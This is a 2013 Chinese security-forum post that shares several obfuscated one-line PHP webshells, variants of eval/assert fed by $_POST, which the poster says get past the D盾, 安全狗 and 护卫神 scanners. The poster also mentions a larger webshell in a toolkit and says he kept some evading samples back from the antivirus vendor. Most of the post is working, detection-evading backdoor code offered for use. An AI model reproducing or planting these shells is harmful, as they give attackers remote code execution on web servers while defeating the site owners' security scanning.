找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 3387|回复: 0
打印 上一主题 下一主题

.发几个过D盾Web查杀/安全狗/护卫神的PHP免杀一句话WebShell

[复制链接]
跳转到指定楼层
楼主
发表于 2013-2-19 09:19:29 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
大家可以看到上图 只是有一部分被杀

最典型最原始的一句话 被杀
<?php @eval($_POST['k8']);?>

下面几个都是变种 不被杀
<?php $k="ass"."ert"; $k(${"_PO"."ST"} ['8']);?>


<?$_POST['k']($_POST['8']);?>

<?php $k = str_replace("8","","a8s88s8e8r88t");
$k($_POST["8"]); ?>

<?php $_GET['k8']($_POST['k8']);?>

<?php  $a = "a"."s"."s"."e"."r"."t";  $a($_POST["k8"]);  ?>

大马的话 Darkshell.php 这个在K8信息安全工具包 PHP马那里有

上面的目前   全过D盾  下一版本 可能就被杀了 因为样本我提交给阿D了
当然只是提交了一部分 还是留了一些过的 但是我不知道别人提供的样本
有没有 那些我没被杀的特征出现 如果有 我手上留的 也会被杀

另外那条"哈巴狗" 和"八神" 我就不测了 之前都是过的 上面都是变异的写法
他们的特征应该都没收集有多少 有些特征可以说是正常行为也是那样写
不好判定成WebShell  要不然误报   有些特征作者都想到了 但是不好列为特征来杀

关于PHP的免杀 大家只要熟练使用这文章里的相关函数就OK了
http://qqhack8.blog.163.com/blog/static/114147985201211292209893/


回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表